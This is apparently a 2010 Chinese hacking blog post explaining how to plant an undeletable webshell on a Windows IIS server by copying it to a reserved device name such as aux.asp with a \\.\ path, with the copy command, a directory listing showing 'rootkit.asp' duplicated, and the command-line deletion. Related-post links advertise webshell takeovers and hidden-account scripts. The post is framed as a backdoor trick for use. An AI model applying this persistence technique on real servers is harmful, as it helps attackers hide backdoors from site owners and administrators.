利用系统保留文件名创建无法删除的webshell

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:

D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp
已复制         1 个文件。


D:\AspWebServer\wwwroot>dir
驱动器 D 中的卷没有标签。
卷的序列号是 4A56-1D29

D:\AspWebServer\wwwroot 的目录

2010-04-25  14:41    <DIR>          .
2010-04-25  14:41    <DIR>          ..
2010-03-08  22:50            42,756 aux.asp
2005-05-02  03:02             9,083 index.asp
2010-03-08  22:50            42,756 rootkit.asp
               3 个文件         94,595 字节
               2 个目录  3,307,204,608 可用字节
这类文件无法在图形界面删除,

只能在命令行下删除:

D:\wwwroot>del \\.\D:\wwwroot\aux.asp

D:\wwwroot>
然而在IIS中,这种文件又是可以解析成功的。

网络收集,供大家参考

 

引用通告: 我要引用此文章
Tags: 后门  服务器  
相关日志:
  • 小技巧:删除远程桌面连接IP记录  (2010-4-22 17:41:43)
  • Discuz!的最新后台通用拿Webshell法,测试可行  (2010-3-30 15:53:32)
  • 鬼影 下载者  (2010-3-17 5:55:41)
  • EIMS 编辑器漏洞  (2010-3-17 4:1:39)
  • 嗅探原理与反嗅探技术详解  (2010-3-14 20:31:36)
  • Jsp一句话 C/S端  (2010-3-12 21:5:18)
  • 让你的虚拟机Vmare也有2个网卡  (2010-3-5 21:35:16)
  • 自动添加隐藏账户脚本vbs  (2010-2-28 8:27:5)
  • 修改组策略直接开启远程桌面  (2010-2-23 21:45:4)
  • 刘谦春晚魔术揭秘视频(春晚视频放慢10倍)  (2010-2-20 13:3:9)
  • 评论: 0 | 引用: 0 | 查看次数:
    发表评论
    昵 称:
    邮 箱:
    主 页:
    验证码:
    内 容:

    AD2's